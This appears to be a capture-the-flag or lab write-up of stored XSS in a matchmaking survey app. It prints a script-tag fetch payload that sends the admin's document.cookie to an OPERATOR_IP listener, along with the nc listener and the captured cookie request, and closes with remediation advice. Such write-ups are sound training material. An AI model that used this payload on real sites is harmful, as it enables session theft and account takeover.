Case file

Stored XSS survey payload steals admin session cookie

Foundations web engagement: matchmaking survey reflected/stored attacker HTML; a fetch beacon exfiltrated the admin cookie to an operator listener.

Foundations16 minWeb · XSS · Session Theft
01

Engagement summary

Survey fields accepted a script tag that fired when admin reviewed submissions; document.cookie hit the operator listener.

CUPID’S MATCHMAKER exposed a survey-driven matchmaking UI and an /admin review surface. User-controlled survey fields were rendered without encoding. A payload that fetched the operator host with document.cookie executed in the admin browser context when the submission was opened, delivering the session cookie to nc on port 8000. Replaying that cookie unlocked admin-only content.

Business impact

Stored XSS against privileged reviewers is account takeover. Encode all output, set HttpOnly/Secure/SameSite on session cookies, deploy a strict CSP, and sanitize rich text on input.

02

Beacon payload and cookie capture

Injected fetch XSS; listener received the admin cookie.

PAYLOAD

survey-xss.html

<script>fetch('http://OPERATOR_IP:8000/?c='+document.cookie)</script>

OPERATOR · XSS

savvy@lab:~$ nc -lnvp 8000

# submit survey with XSS payload; wait for admin review

GET /?c=session=<admin_cookie> HTTP/1.1

Remediation

Context-aware encoding, CSP with nonces, HttpOnly cookies, and admin MFA. Treat any stored HTML as untrusted.